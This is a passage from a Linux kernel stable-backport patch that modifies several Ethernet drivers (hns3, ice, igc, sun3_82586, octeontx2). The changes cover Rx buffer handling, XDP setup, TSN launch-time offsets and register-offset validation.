++			     req->mbx_src_vfid > hdev->num_req_vfs)) {
+ 			dev_warn(&hdev->pdev->dev,
+-				 "dropped invalid mailbox message, code = %u\n",
+-				 req->msg.code);
++				 "dropped invalid mailbox message, code = %u, vfid = %u\n",
++				 req->msg.code, req->mbx_src_vfid);
+ 
+ 			/* dropping/not processing this invalid message */
+ 			crq->desc[crq->next_to_use].flag = 0;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mdio.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mdio.c
+index 85fb11de43a12..80079657afebe 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mdio.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mdio.c
+@@ -191,6 +191,9 @@ static void hclge_mac_adjust_link(struct net_device *netdev)
+ 	if (ret)
+ 		netdev_err(netdev, "failed to adjust link.\n");
+ 
++	hdev->hw.mac.req_speed = (u32)speed;
++	hdev->hw.mac.req_duplex = (u8)duplex;
++
+ 	ret = hclge_cfg_flowctrl(hdev);
+ 	if (ret)
+ 		netdev_err(netdev, "failed to configure flow control.\n");
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+index 1f5a27fb309aa..aebb104f4c290 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+@@ -1764,8 +1764,8 @@ static void hclgevf_reset_done(struct hnae3_ae_dev *ae_dev)
+ 			 ret);
+ 
+ 	hdev->reset_type = HNAE3_NONE_RESET;
+-	clear_bit(HCLGEVF_STATE_RST_HANDLING, &hdev->state);
+-	up(&hdev->reset_sem);
++	if (test_and_clear_bit(HCLGEVF_STATE_RST_HANDLING, &hdev->state))
++		up(&hdev->reset_sem);
+ }
+ 
+ static u32 hclgevf_get_fw_version(struct hnae3_handle *handle)
+diff --git a/drivers/net/ethernet/i825xx/sun3_82586.c b/drivers/net/ethernet/i825xx/sun3_82586.c
+index 3909c6a0af89f..72d3b5328ebb4 100644
+--- a/drivers/net/ethernet/i825xx/sun3_82586.c
++++ b/drivers/net/ethernet/i825xx/sun3_82586.c
+@@ -986,7 +986,7 @@ static void sun3_82586_timeout(struct net_device *dev, unsigned int txqueue)
+ 	{
+ #ifdef DEBUG
+ 		printk("%s: xmitter timed out, try to restart! stat: %02x\n",dev->name,p->scb->cus);
+-		printk("%s: command-stats: %04x %04x\n",dev->name,swab16(p->xmit_cmds[0]->cmd_status),swab16(p->xmit_cmds[1]->cmd_status));
++		printk("%s: command-stats: %04x\n", dev->name, swab16(p->xmit_cmds[0]->cmd_status));
+ 		printk("%s: check, whether you set the right interrupt number!\n",dev->name);
+ #endif
+ 		sun3_82586_close(dev);
+diff --git a/drivers/net/ethernet/intel/ice/ice_base.c b/drivers/net/ethernet/intel/ice/ice_base.c
+index 818eca6aa4a41..4db4ec4b8857a 100644
+--- a/drivers/net/ethernet/intel/ice/ice_base.c
++++ b/drivers/net/ethernet/intel/ice/ice_base.c
+@@ -355,9 +355,6 @@ static unsigned int ice_rx_offset(struct ice_rx_ring *rx_ring)
+ {
+ 	if (ice_ring_uses_build_skb(rx_ring))
+ 		return ICE_SKB_PAD;
+-	else if (ice_is_xdp_ena_vsi(rx_ring->vsi))
+-		return XDP_PACKET_HEADROOM;
+-
+ 	return 0;
+ }
+ 
+@@ -537,6 +534,7 @@ int ice_vsi_cfg_rxq(struct ice_rx_ring *ring)
+ 		}
+ 	}
+ 
++	xdp_init_buff(&ring->xdp, ice_rx_pg_size(ring) / 2, &ring->xdp_rxq);
+ 	err = ice_setup_rx_ctx(ring);
+ 	if (err) {
+ 		dev_err(dev, "ice_setup_rx_ctx failed for RxQ %d, err %d\n",
+diff --git a/drivers/net/ethernet/intel/ice/ice_lib.c b/drivers/net/ethernet/intel/ice/ice_lib.c
+index 7661e735d0992..347c6c23bfc1c 100644
+--- a/drivers/net/ethernet/intel/ice/ice_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_lib.c
+@@ -1818,8 +1818,8 @@ void ice_update_eth_stats(struct ice_vsi *vsi)
+ void ice_vsi_cfg_frame_size(struct ice_vsi *vsi)
+ {
+ 	if (!vsi->netdev || test_bit(ICE_FLAG_LEGACY_RX, vsi->back->flags)) {
+-		vsi->max_frame = ICE_AQ_SET_MAC_FRAME_SIZE_MAX;
+-		vsi->rx_buf_len = ICE_RXBUF_2048;
++		vsi->max_frame = ICE_MAX_FRAME_LEGACY_RX;
++		vsi->rx_buf_len = ICE_RXBUF_1664;
+ #if (PAGE_SIZE < 8192)
+ 	} else if (!ICE_2K_TOO_SMALL_WITH_PADDING &&
+ 		   (vsi->netdev->mtu <= ETH_DATA_LEN)) {
+@@ -1828,11 +1828,7 @@ void ice_vsi_cfg_frame_size(struct ice_vsi *vsi)
+ #endif
+ 	} else {
+ 		vsi->max_frame = ICE_AQ_SET_MAC_FRAME_SIZE_MAX;
+-#if (PAGE_SIZE < 8192)
+ 		vsi->rx_buf_len = ICE_RXBUF_3072;
+-#else
+-		vsi->rx_buf_len = ICE_RXBUF_2048;
+-#endif
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 6e55861dd86fe..9dbfbc90485e4 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -7328,8 +7328,8 @@ static void ice_rebuild(struct ice_pf *pf, enum ice_reset_req reset_type)
+  */
+ static int ice_max_xdp_frame_size(struct ice_vsi *vsi)
+ {
+-	if (PAGE_SIZE >= 8192 || test_bit(ICE_FLAG_LEGACY_RX, vsi->back->flags))
+-		return ICE_RXBUF_2048 - XDP_PACKET_HEADROOM;
++	if (test_bit(ICE_FLAG_LEGACY_RX, vsi->back->flags))
++		return ICE_RXBUF_1664;
+ 	else
+ 		return ICE_RXBUF_3072;
+ }
+@@ -7362,6 +7362,12 @@ static int ice_change_mtu(struct net_device *netdev, int new_mtu)
+ 				   frame_size - ICE_ETH_PKT_HDR_PAD);
+ 			return -EINVAL;
+ 		}
++	} else if (test_bit(ICE_FLAG_LEGACY_RX, pf->flags)) {
++		if (new_mtu + ICE_ETH_PKT_HDR_PAD > ICE_MAX_FRAME_LEGACY_RX) {
++			netdev_err(netdev, "Too big MTU for legacy-rx; Max is %d\n",
++				   ICE_MAX_FRAME_LEGACY_RX - ICE_ETH_PKT_HDR_PAD);
++			return -EINVAL;
++		}
+ 	}
+ 
+ 	/* if a reset is in progress, wait for some time for it to complete */
+diff --git a/drivers/net/ethernet/intel/ice/ice_txrx.c b/drivers/net/ethernet/intel/ice/ice_txrx.c
+index bd62781191b3d..6172e0daa718d 100644
+--- a/drivers/net/ethernet/intel/ice/ice_txrx.c
++++ b/drivers/net/ethernet/intel/ice/ice_txrx.c
+@@ -523,8 +523,16 @@ int ice_setup_rx_ring(struct ice_rx_ring *rx_ring)
+ 	return -ENOMEM;
+ }
+ 
++/**
++ * ice_rx_frame_truesize
++ * @rx_ring: ptr to Rx ring
++ * @size: size
++ *
++ * calculate the truesize with taking into the account PAGE_SIZE of
++ * underlying arch
++ */
+ static unsigned int
+-ice_rx_frame_truesize(struct ice_rx_ring *rx_ring, unsigned int __maybe_unused size)
++ice_rx_frame_truesize(struct ice_rx_ring *rx_ring, const unsigned int size)
+ {
+ 	unsigned int truesize;
+ 
+@@ -783,7 +791,6 @@ ice_rx_buf_adjust_pg_offset(struct ice_rx_buf *rx_buf, unsigned int size)
+ /**
+  * ice_can_reuse_rx_page - Determine if page can be reused for another Rx
+  * @rx_buf: buffer containing the page
+- * @rx_buf_pgcnt: rx_buf page refcount pre xdp_do_redirect() call
+  *
+  * If page is reusable, we have a green light for calling ice_reuse_rx_page,
+  * which will assign the current buffer to the buffer that next_to_alloc is
+@@ -791,7 +798,7 @@ ice_rx_buf_adjust_pg_offset(struct ice_rx_buf *rx_buf, unsigned int size)
+  * page freed
+  */
+ static bool
+-ice_can_reuse_rx_page(struct ice_rx_buf *rx_buf, int rx_buf_pgcnt)
++ice_can_reuse_rx_page(struct ice_rx_buf *rx_buf)
+ {
+ 	unsigned int pagecnt_bias = rx_buf->pagecnt_bias;
+ 	struct page *page = rx_buf->page;
+@@ -800,16 +807,15 @@ ice_can_reuse_rx_page(struct ice_rx_buf *rx_buf, int rx_buf_pgcnt)
+ 	if (!dev_page_is_reusable(page))
+ 		return false;
+ 
+-#if (PAGE_SIZE < 8192)
+ 	/* if we are only owner of page we can reuse it */
+-	if (unlikely((rx_buf_pgcnt - pagecnt_bias) > 1))
++	if (unlikely(rx_buf->pgcnt - pagecnt_bias > 1))
+ 		return false;
+-#else
++#if (PAGE_SIZE >= 8192)
+ #define ICE_LAST_OFFSET \
+-	(SKB_WITH_OVERHEAD(PAGE_SIZE) - ICE_RXBUF_2048)
++	(SKB_WITH_OVERHEAD(PAGE_SIZE) - ICE_RXBUF_3072)
+ 	if (rx_buf->page_offset > ICE_LAST_OFFSET)
+ 		return false;
+-#endif /* PAGE_SIZE < 8192) */
++#endif /* PAGE_SIZE >= 8192) */
+ 
+ 	/* If we have drained the page fragment pool we need to update
+ 	 * the pagecnt_bias and page count so that we fully restock the
+@@ -886,24 +892,19 @@ ice_reuse_rx_page(struct ice_rx_ring *rx_ring, struct ice_rx_buf *old_buf)
+  * ice_get_rx_buf - Fetch Rx buffer and synchronize data for use
+  * @rx_ring: Rx descriptor ring to transact packets on
+  * @size: size of buffer to add to skb
+- * @rx_buf_pgcnt: rx_buf page refcount
++ * @ntc: index of next to clean element
+  *
+  * This function will pull an Rx buffer from the ring and synchronize it
+  * for use by the CPU.
+  */
+ static struct ice_rx_buf *
+ ice_get_rx_buf(struct ice_rx_ring *rx_ring, const unsigned int size,
+-	       int *rx_buf_pgcnt)
++	       const unsigned int ntc)
+ {
+ 	struct ice_rx_buf *rx_buf;
+ 
+-	rx_buf = &rx_ring->rx_buf[rx_ring->next_to_clean];
+-	*rx_buf_pgcnt =
+-#if (PAGE_SIZE < 8192)
+-		page_count(rx_buf->page);
+-#else
+-		0;
+-#endif
++	rx_buf = &rx_ring->rx_buf[ntc];
++	rx_buf->pgcnt = page_count(rx_buf->page);
+ 	prefetchw(rx_buf->page);
+ 
+ 	if (!size)
+@@ -973,7 +974,6 @@ ice_build_skb(struct ice_rx_ring *rx_ring, struct ice_rx_buf *rx_buf,
+ /**
+  * ice_construct_skb - Allocate skb and populate it
+  * @rx_ring: Rx descriptor ring to transact packets on
+- * @rx_buf: Rx buffer to pull data from
+  * @xdp: xdp_buff pointing to the data
+  *
+  * This function allocates an skb. It then populates it with the page
+@@ -984,17 +984,15 @@ static struct sk_buff *
+ ice_construct_skb(struct ice_rx_ring *rx_ring, struct ice_rx_buf *rx_buf,
+ 		  struct xdp_buff *xdp)
+ {
+-	unsigned int metasize = xdp->data - xdp->data_meta;
+ 	unsigned int size = xdp->data_end - xdp->data;
+ 	unsigned int headlen;
+ 	struct sk_buff *skb;
+ 
+ 	/* prefetch first cache line of first page */
+-	net_prefetch(xdp->data_meta);
++	net_prefetch(xdp->data);
+ 
+ 	/* allocate a skb to store the frags */
+-	skb = __napi_alloc_skb(&rx_ring->q_vector->napi,
+-			       ICE_RX_HDR_SIZE + metasize,
++	skb = __napi_alloc_skb(&rx_ring->q_vector->napi, ICE_RX_HDR_SIZE,
+ 			       GFP_ATOMIC | __GFP_NOWARN);
+ 	if (unlikely(!skb))
+ 		return NULL;
+@@ -1006,13 +1004,8 @@ ice_construct_skb(struct ice_rx_ring *rx_ring, struct ice_rx_buf *rx_buf,
+ 		headlen = eth_get_headlen(skb->dev, xdp->data, ICE_RX_HDR_SIZE);
+ 
+ 	/* align pull length to size of long to optimize memcpy performance */
+-	memcpy(__skb_put(skb, headlen + metasize), xdp->data_meta,
+-	       ALIGN(headlen + metasize, sizeof(long)));
+-
+-	if (metasize) {
+-		skb_metadata_set(skb, metasize);
+-		__skb_pull(skb, metasize);
+-	}
++	memcpy(__skb_put(skb, headlen), xdp->data, ALIGN(headlen,
++							 sizeof(long)));
+ 
+ 	/* if we exhaust the linear part then add what is left as a frag */
+ 	size -= headlen;
+@@ -1041,26 +1034,17 @@ ice_construct_skb(struct ice_rx_ring *rx_ring, struct ice_rx_buf *rx_buf,
+  * ice_put_rx_buf - Clean up used buffer and either recycle or free
+  * @rx_ring: Rx descriptor ring to transact packets on
+  * @rx_buf: Rx buffer to pull data from
+- * @rx_buf_pgcnt: Rx buffer page count pre xdp_do_redirect()
+  *
+- * This function will update next_to_clean and then clean up the contents
+- * of the rx_buf. It will either recycle the buffer or unmap it and free
+- * the associated resources.
++ * This function will clean up the contents of the rx_buf. It will either
++ * recycle the buffer or unmap it and free the associated resources.
+  */
+ static void
+-ice_put_rx_buf(struct ice_rx_ring *rx_ring, struct ice_rx_buf *rx_buf,
+-	       int rx_buf_pgcnt)
++ice_put_rx_buf(struct ice_rx_ring *rx_ring, struct ice_rx_buf *rx_buf)
+ {
+-	u16 ntc = rx_ring->next_to_clean + 1;
+-
+-	/* fetch, update, and store next to clean */
+-	ntc = (ntc < rx_ring->count) ? ntc : 0;
+-	rx_ring->next_to_clean = ntc;
+-
+ 	if (!rx_buf)
+ 		return;
+ 
+-	if (ice_can_reuse_rx_page(rx_buf, rx_buf_pgcnt)) {
++	if (ice_can_reuse_rx_page(rx_buf)) {
+ 		/* hand second half of page back to the ring */
+ 		ice_reuse_rx_page(rx_ring, rx_buf);
+ 	} else {
+@@ -1110,21 +1094,22 @@ ice_is_non_eop(struct ice_rx_ring *rx_ring, union ice_32b_rx_flex_desc *rx_desc)
+  */
+ int ice_clean_rx_irq(struct ice_rx_ring *rx_ring, int budget)
+ {
+-	unsigned int total_rx_bytes = 0, total_rx_pkts = 0, frame_sz = 0;
++	unsigned int total_rx_bytes = 0, total_rx_pkts = 0;
+ 	u16 cleaned_count = ICE_DESC_UNUSED(rx_ring);
+ 	unsigned int offset = rx_ring->rx_offset;
++	struct xdp_buff *xdp = &rx_ring->xdp;
+ 	struct ice_tx_ring *xdp_ring = NULL;
+ 	unsigned int xdp_res, xdp_xmit = 0;
+ 	struct sk_buff *skb = rx_ring->skb;
+ 	struct bpf_prog *xdp_prog = NULL;
+-	struct xdp_buff xdp;
++	u32 ntc = rx_ring->next_to_clean;
++	u32 cnt = rx_ring->count;
+ 	bool failure;
+ 
+ 	/* Frame size depend on rx_ring setup when PAGE_SIZE=4K */
+ #if (PAGE_SIZE < 8192)
+-	frame_sz = ice_rx_frame_truesize(rx_ring, 0);
++	xdp->frame_sz = ice_rx_frame_truesize(rx_ring, 0);
+ #endif
+-	xdp_init_buff(&xdp, frame_sz, &rx_ring->xdp_rxq);
+ 
+ 	xdp_prog = READ_ONCE(rx_ring->xdp_prog);
+ 	if (xdp_prog)
+@@ -1137,12 +1122,11 @@ int ice_clean_rx_irq(struct ice_rx_ring *rx_ring, int budget)
+ 		unsigned char *hard_start;
+ 		unsigned int size;
+ 		u16 stat_err_bits;
+-		int rx_buf_pgcnt;
+ 		u16 vlan_tag = 0;
+ 		u16 rx_ptype;
+ 
+ 		/* get the Rx desc from Rx ring based on 'next_to_clean' */
+-		rx_desc = ICE_RX_DESC(rx_ring, rx_ring->next_to_clean);
++		rx_desc = ICE_RX_DESC(rx_ring, ntc);
+ 
+ 		/* status_error_len will always be zero for unused descriptors
+ 		 * because it's cleared in cleanup, and overlaps with hdr_addr
+@@ -1166,7 +1150,9 @@ int ice_clean_rx_irq(struct ice_rx_ring *rx_ring, int budget)
+ 			if (rx_desc->wb.rxdid == FDIR_DESC_RXDID &&
+ 			    ctrl_vsi->vf)
+ 				ice_vc_fdir_irq_handler(ctrl_vsi, rx_desc);
+-			ice_put_rx_buf(rx_ring, NULL, 0);
++			if (++ntc == cnt)
++				ntc = 0;
++			ice_put_rx_buf(rx_ring, NULL);
+ 			cleaned_count++;
+ 			continue;
+ 		}
+@@ -1175,33 +1161,33 @@ int ice_clean_rx_irq(struct ice_rx_ring *rx_ring, int budget)
+ 			ICE_RX_FLX_DESC_PKT_LEN_M;
+ 
+ 		/* retrieve a buffer from the ring */
+-		rx_buf = ice_get_rx_buf(rx_ring, size, &rx_buf_pgcnt);
++		rx_buf = ice_get_rx_buf(rx_ring, size, ntc);
+ 
+ 		if (!size) {
+-			xdp.data = NULL;
+-			xdp.data_end = NULL;
+-			xdp.data_hard_start = NULL;
+-			xdp.data_meta = NULL;
++			xdp->data = NULL;
++			xdp->data_end = NULL;
++			xdp->data_hard_start = NULL;
++			xdp->data_meta = NULL;
+ 			goto construct_skb;
+ 		}
+ 
+ 		hard_start = page_address(rx_buf->page) + rx_buf->page_offset -
+ 			     offset;
+-		xdp_prepare_buff(&xdp, hard_start, offset, size, true);
++		xdp_prepare_buff(xdp, hard_start, offset, size, !!offset);
+ #if (PAGE_SIZE > 4096)
+ 		/* At larger PAGE_SIZE, frame_sz depend on len size */
+-		xdp.frame_sz = ice_rx_frame_truesize(rx_ring, size);
++		xdp->frame_sz = ice_rx_frame_truesize(rx_ring, size);
+ #endif
+ 
+ 		if (!xdp_prog)
+ 			goto construct_skb;
+ 
+-		xdp_res = ice_run_xdp(rx_ring, &xdp, xdp_prog, xdp_ring);
++		xdp_res = ice_run_xdp(rx_ring, xdp, xdp_prog, xdp_ring);
+ 		if (!xdp_res)
+ 			goto construct_skb;
+ 		if (xdp_res & (ICE_XDP_TX | ICE_XDP_REDIR)) {
+ 			xdp_xmit |= xdp_res;
+-			ice_rx_buf_adjust_pg_offset(rx_buf, xdp.frame_sz);
++			ice_rx_buf_adjust_pg_offset(rx_buf, xdp->frame_sz);
+ 		} else {
+ 			rx_buf->pagecnt_bias++;
+ 		}
+@@ -1209,16 +1195,18 @@ int ice_clean_rx_irq(struct ice_rx_ring *rx_ring, int budget)
+ 		total_rx_pkts++;
+ 
+ 		cleaned_count++;
+-		ice_put_rx_buf(rx_ring, rx_buf, rx_buf_pgcnt);
++		if (++ntc == cnt)
++			ntc = 0;
++		ice_put_rx_buf(rx_ring, rx_buf);
+ 		continue;
+ construct_skb:
+ 		if (skb) {
+ 			ice_add_rx_frag(rx_ring, rx_buf, skb, size);
+-		} else if (likely(xdp.data)) {
++		} else if (likely(xdp->data)) {
+ 			if (ice_ring_uses_build_skb(rx_ring))
+-				skb = ice_build_skb(rx_ring, rx_buf, &xdp);
++				skb = ice_build_skb(rx_ring, rx_buf, xdp);
+ 			else
+-				skb = ice_construct_skb(rx_ring, rx_buf, &xdp);
++				skb = ice_construct_skb(rx_ring, rx_buf, xdp);
+ 		}
+ 		/* exit if we failed to retrieve a buffer */
+ 		if (!skb) {
+@@ -1228,7 +1216,9 @@ int ice_clean_rx_irq(struct ice_rx_ring *rx_ring, int budget)
+ 			break;
+ 		}
+ 
+-		ice_put_rx_buf(rx_ring, rx_buf, rx_buf_pgcnt);
++		if (++ntc == cnt)
++			ntc = 0;
++		ice_put_rx_buf(rx_ring, rx_buf);
+ 		cleaned_count++;
+ 
+ 		/* skip if it is NOP desc */
+@@ -1268,6 +1258,7 @@ int ice_clean_rx_irq(struct ice_rx_ring *rx_ring, int budget)
+ 		total_rx_pkts++;
+ 	}
+ 
++	rx_ring->next_to_clean = ntc;
+ 	/* return up to cleaned_count buffers to hardware */
+ 	failure = ice_alloc_rx_bufs(rx_ring, cleaned_count);
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_txrx.h b/drivers/net/ethernet/intel/ice/ice_txrx.h
+index 932b5661ec4d6..c1d9b3cebb059 100644
+--- a/drivers/net/ethernet/intel/ice/ice_txrx.h
++++ b/drivers/net/ethernet/intel/ice/ice_txrx.h
+@@ -9,10 +9,12 @@
+ #define ICE_DFLT_IRQ_WORK	256
+ #define ICE_RXBUF_3072		3072
+ #define ICE_RXBUF_2048		2048
++#define ICE_RXBUF_1664		1664
+ #define ICE_RXBUF_1536		1536
+ #define ICE_MAX_CHAINED_RX_BUFS	5
+ #define ICE_MAX_BUF_TXD		8
+ #define ICE_MIN_TX_LEN		17
++#define ICE_MAX_FRAME_LEGACY_RX 8320
+ 
+ /* The size limit for a transmit buffer in a descriptor is (16K - 1).
+  * In order to align with the read requests we will align the value to
+@@ -170,7 +172,8 @@ struct ice_rx_buf {
+ 	dma_addr_t dma;
+ 	struct page *page;
+ 	unsigned int page_offset;
+-	u16 pagecnt_bias;
++	unsigned int pgcnt;
++	unsigned int pagecnt_bias;
+ };
+ 
+ struct ice_q_stats {
+@@ -293,6 +296,7 @@ struct ice_rx_ring {
+ 	struct bpf_prog *xdp_prog;
+ 	struct ice_tx_ring *xdp_ring;
+ 	struct xsk_buff_pool *xsk_pool;
++	struct xdp_buff xdp;
+ 	struct sk_buff *skb;
+ 	dma_addr_t dma;			/* physical address of ring */
+ 	u64 cached_phctime;
+diff --git a/drivers/net/ethernet/intel/ice/ice_txrx_lib.c b/drivers/net/ethernet/intel/ice/ice_txrx_lib.c
+index 7ee38d02d1e57..d137b98d78eb6 100644
+--- a/drivers/net/ethernet/intel/ice/ice_txrx_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_txrx_lib.c
+@@ -349,6 +349,7 @@ int ice_xmit_xdp_buff(struct xdp_buff *xdp, struct ice_tx_ring *xdp_ring)
+  * ice_finalize_xdp_rx - Bump XDP Tx tail and/or flush redirect map
+  * @xdp_ring: XDP ring
+  * @xdp_res: Result of the receive batch
++ * @first_idx: index to write from caller
+  *
+  * This function bumps XDP Tx tail and/or flush redirect map, and
+  * should be called when a batch of packets has been processed in the
+diff --git a/drivers/net/ethernet/intel/igc/igc_defines.h b/drivers/net/ethernet/intel/igc/igc_defines.h
+index efdabcbd66ddd..8187a658dcbd5 100644
+--- a/drivers/net/ethernet/intel/igc/igc_defines.h
++++ b/drivers/net/ethernet/intel/igc/igc_defines.h
+@@ -402,6 +402,21 @@
+ #define IGC_DTXMXPKTSZ_TSN	0x19 /* 1600 bytes of max TX DMA packet size */
+ #define IGC_DTXMXPKTSZ_DEFAULT	0x98 /* 9728-byte Jumbo frames */
+ 
++/* Retry Buffer Control */
++#define IGC_RETX_CTL			0x041C
++#define IGC_RETX_CTL_WATERMARK_MASK	0xF
++#define IGC_RETX_CTL_QBVFULLTH_SHIFT	8 /* QBV Retry Buffer Full Threshold */
++#define IGC_RETX_CTL_QBVFULLEN	0x1000 /* Enable QBV Retry Buffer Full Threshold */
++
++/* Transmit Scheduling Latency */
++/* Latency between transmission scheduling (LaunchTime) and the time
++ * the packet is transmitted to the network in nanosecond.
++ */
++#define IGC_TXOFFSET_SPEED_10	0x000034BC
++#define IGC_TXOFFSET_SPEED_100	0x00000578
++#define IGC_TXOFFSET_SPEED_1000	0x0000012C
++#define IGC_TXOFFSET_SPEED_2500	0x00000578
++
+ /* Time Sync Interrupt Causes */
+ #define IGC_TSICR_SYS_WRAP	BIT(0) /* SYSTIM Wrap around. */
+ #define IGC_TSICR_TXTS		BIT(1) /* Transmit Timestamp. */
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index e052f49cc08d7..39f8f28288aaa 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -5586,6 +5586,13 @@ static void igc_watchdog_task(struct work_struct *work)
+ 				break;
+ 			}
+ 
++			/* Once the launch time has been set on the wire, there
++			 * is a delay before the link speed can be determined
++			 * based on link-up activity. Write into the register
++			 * as soon as we know the correct link speed.
++			 */
++			igc_tsn_adjust_txtime_offset(adapter);
++
+ 			if (adapter->link_speed != SPEED_1000)
+ 				goto no_wait;
+ 
+diff --git a/drivers/net/ethernet/intel/igc/igc_regs.h b/drivers/net/ethernet/intel/igc/igc_regs.h
+index c0d8214148d1d..01c86d36856d2 100644
+--- a/drivers/net/ethernet/intel/igc/igc_regs.h
++++ b/drivers/net/ethernet/intel/igc/igc_regs.h
+@@ -224,6 +224,7 @@
+ /* Transmit Scheduling Registers */
+ #define IGC_TQAVCTRL		0x3570
+ #define IGC_TXQCTL(_n)		(0x3344 + 0x4 * (_n))
++#define IGC_GTXOFFSET		0x3310
+ #define IGC_BASET_L		0x3314
+ #define IGC_BASET_H		0x3318
+ #define IGC_QBVCYCLET		0x331C
+diff --git a/drivers/net/ethernet/intel/igc/igc_tsn.c b/drivers/net/ethernet/intel/igc/igc_tsn.c
+index 31ea0781b65ec..abdaaf7db4125 100644
+--- a/drivers/net/ethernet/intel/igc/igc_tsn.c
++++ b/drivers/net/ethernet/intel/igc/igc_tsn.c
+@@ -49,6 +49,44 @@ static unsigned int igc_tsn_new_flags(struct igc_adapter *adapter)
+ 	return new_flags;
+ }
+ 
++void igc_tsn_adjust_txtime_offset(struct igc_adapter *adapter)
++{
++	struct igc_hw *hw = &adapter->hw;
++	u16 txoffset;
++
++	if (!is_any_launchtime(adapter))
++		return;
++
++	switch (adapter->link_speed) {
++	case SPEED_10:
++		txoffset = IGC_TXOFFSET_SPEED_10;
++		break;
++	case SPEED_100:
++		txoffset = IGC_TXOFFSET_SPEED_100;
++		break;
++	case SPEED_1000:
++		txoffset = IGC_TXOFFSET_SPEED_1000;
++		break;
++	case SPEED_2500:
++		txoffset = IGC_TXOFFSET_SPEED_2500;
++		break;
++	default:
++		txoffset = 0;
++		break;
++	}
++
++	wr32(IGC_GTXOFFSET, txoffset);
++}
++
++static void igc_tsn_restore_retx_default(struct igc_adapter *adapter)
++{
++	struct igc_hw *hw = &adapter->hw;
++	u32 retxctl;
++
++	retxctl = rd32(IGC_RETX_CTL) & IGC_RETX_CTL_WATERMARK_MASK;
++	wr32(IGC_RETX_CTL, retxctl);
++}
++
+ /* Returns the TSN specific registers to their default values after
+  * the adapter is reset.
+  */
+@@ -58,9 +96,13 @@ static int igc_tsn_disable_offload(struct igc_adapter *adapter)
+ 	u32 tqavctrl;
+ 	int i;
+ 
++	wr32(IGC_GTXOFFSET, 0);
+ 	wr32(IGC_TXPBS, I225_TXPBSIZE_DEFAULT);
+ 	wr32(IGC_DTXMXPKTSZ, IGC_DTXMXPKTSZ_DEFAULT);
+ 
++	if (igc_is_device_id_i226(hw))
++		igc_tsn_restore_retx_default(adapter);
++
+ 	tqavctrl = rd32(IGC_TQAVCTRL);
+ 	tqavctrl &= ~(IGC_TQAVCTRL_TRANSMIT_MODE_TSN |
+ 		      IGC_TQAVCTRL_ENHANCED_QAV | IGC_TQAVCTRL_FUTSCDDIS);
+@@ -81,6 +123,25 @@ static int igc_tsn_disable_offload(struct igc_adapter *adapter)
+ 	return 0;
+ }
+ 
++/* To partially fix i226 HW errata, reduce MAC internal buffering from 192 Bytes
++ * to 88 Bytes by setting RETX_CTL register using the recommendation from:
++ * a) Ethernet Controller I225/I226 Specification Update Rev 2.1
++ *    Item 9: TSN: Packet Transmission Might Cross the Qbv Window
++ * b) I225/6 SW User Manual Rev 1.2.4: Section 8.11.5 Retry Buffer Control
++ */
++static void igc_tsn_set_retx_qbvfullthreshold(struct igc_adapter *adapter)
++{
++	struct igc_hw *hw = &adapter->hw;
++	u32 retxctl, watermark;
++
++	retxctl = rd32(IGC_RETX_CTL);
++	watermark = retxctl & IGC_RETX_CTL_WATERMARK_MASK;
++	/* Set QBVFULLTH value using watermark and set QBVFULLEN */
++	retxctl |= (watermark << IGC_RETX_CTL_QBVFULLTH_SHIFT) |
++		   IGC_RETX_CTL_QBVFULLEN;
++	wr32(IGC_RETX_CTL, retxctl);
++}
++
+ static int igc_tsn_enable_offload(struct igc_adapter *adapter)
+ {
+ 	struct igc_hw *hw = &adapter->hw;
+@@ -94,6 +155,9 @@ static int igc_tsn_enable_offload(struct igc_adapter *adapter)
+ 	wr32(IGC_DTXMXPKTSZ, IGC_DTXMXPKTSZ_TSN);
+ 	wr32(IGC_TXPBS, IGC_TXPBSIZE_TSN);
+ 
++	if (igc_is_device_id_i226(hw))
++		igc_tsn_set_retx_qbvfullthreshold(adapter);
++
+ 	for (i = 0; i < adapter->num_tx_queues; i++) {
+ 		struct igc_ring *ring = adapter->tx_ring[i];
+ 		u32 txqctl = 0;
+diff --git a/drivers/net/ethernet/intel/igc/igc_tsn.h b/drivers/net/ethernet/intel/igc/igc_tsn.h
+index 1512307f5a528..b53e6af560b73 100644
+--- a/drivers/net/ethernet/intel/igc/igc_tsn.h
++++ b/drivers/net/ethernet/intel/igc/igc_tsn.h
+@@ -6,5 +6,6 @@
+ 
+ int igc_tsn_offload_apply(struct igc_adapter *adapter);
+ int igc_tsn_reset(struct igc_adapter *adapter);
++void igc_tsn_adjust_txtime_offset(struct igc_adapter *adapter);
+ 
+ #endif /* _IGC_BASE_H */
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c
+index b226a4d376aab..160e044c25c24 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c
+@@ -632,7 +632,9 @@ int rvu_mbox_handler_cpt_inline_ipsec_cfg(struct rvu *rvu,
+ 	return ret;
+ }
+ 
+-static bool is_valid_offset(struct rvu *rvu, struct cpt_rd_wr_reg_msg *req)
++static bool validate_and_update_reg_offset(struct rvu *rvu,
++					   struct cpt_rd_wr_reg_msg *req,
++					   u64 *reg_offset)
+ {
+ 	u64 offset = req->reg_offset;
+ 	int blkaddr, num_lfs, lf;
